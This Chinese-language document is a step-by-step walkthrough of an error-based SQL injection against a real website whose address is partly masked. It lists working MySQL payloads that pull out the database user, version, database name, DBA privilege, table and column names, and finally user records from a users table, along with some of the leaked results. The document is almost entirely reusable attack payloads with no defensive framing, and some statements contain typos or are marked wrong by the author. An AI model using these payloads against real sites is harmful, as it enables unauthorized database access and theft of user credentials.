1.注入点:
http://www.******/index.php?********&id=14
2.确定当前用户:
AND (SELECT 8471 FROM (SELECTCOUNT(*),CONCAT(0x23232323,(MID((IFNULL(CAST( CURRENT_USER() ASCHAR),0x20)),1,50)),0x23232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
提示错误:*******_dbadmin@localhost
3.确定数据库版本:
AND (SELECT 8471 FROM (SELECT COUNT(*),CONCAT(0x716b6b7671,(MID((IFNULL(CAST(@@version AS CHAR),0x20)),1,50)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
解析如下:
AND(
SELECT 8471 FROM
(SELECT COUNT(*),
CONCAT(0x716b6b7671,
(MID((IFNULL(CAST(@@version AS CHAR),0x20)),1,50)),
0x7166646b71,
FLOOR(RAND(0)*2)
)x
FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x
)a
)
提示错误: 5.5.37-cll
4.确定数据库:
AND (SELECT 8471 FROM (SELECTCOUNT(*),CONCAT(0x716b6b7671,(MID((IFNULL(CAST( DATABASE() ASCHAR),0x20)),1,50)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
提示错误:******_web
5.确定当前用户是否为DBA(is_dba):(此语句有误)
AND (SELECT 3040 FROM(SELECTCOUNT(*),CONCAT(0x716b6b7671,(SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x616f7061636f5f646261646d696e LIMIT 0,1)=0x59) THEN 1ELSE 0 END)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP BY x)a)
6.确定数据库中的表个数及其名称:
AND (SELECT 4537 FROM(SELECTCOUNT(*),CONCAT(0x716b6b7671,(SELECT IFNULL(CAST(COUNT(table_name) ASCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN(0x***************)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
提示错误:表的个数是166个。说明:table_schema IN (0x******************) 中的参数为数据库名称的十六进制表示。
以此确定每个表的名称:
AND(SELECT 7765 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTMID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x*******************) LIMIT0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP BY x)a)
---- 提示:LIMIT 0,1 用于指定表名称的序号:0,1 表示第一个表的名称;1,1 表示第二个表的名称;33,1 表示第34个表的名称。后文语句中的 table_name=0x6a74626c5f7573657273 AND table_schema=0x******************,第一个参数为表名称,第二个参数为数据库名称(均为十六进制表示)。
提示错误:
7.确定表的列数及其名称:
AND(SELECT 1107 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTIFNULL(CAST(COUNT(*)AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x*************************),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
依次确定列名称:
AND(SELECT 8709 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTMID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x*********************LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
解析基于错误的SQL语句:
解析结果如下:
SELECT 4537 FROM
(
SELECT COUNT(*),
CONCAT(
0x716b6b7671,
(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20)
FROM INFORMATION_SCHEMA.TABLES
WHERE table_schema IN (0x*****************)),
0x7166646b71,
FLOOR(RAND(0)*2)
)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x
)a
红色部分(原文中以颜色标出,此处已无法显示):根据个人需求变化
8.查询指定列字段名
14 AND (SELECT 3313 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x********************** AND (column_name=0x******************) LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
语句中的 column_name=0x****************** 为所查询列字段名称的十六进制表示
9.查询指定列字段的数据类型
AND (SELECT 6785 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50)FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x******** AND (column_name=0x70617373776f7264) LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
10.查询内部用户的信息:
AND (SELECT 3225 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(columns_name AS CHAR),0x20)),1,50) FROM *****_web.jtbl_users where username=0x6164616d LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)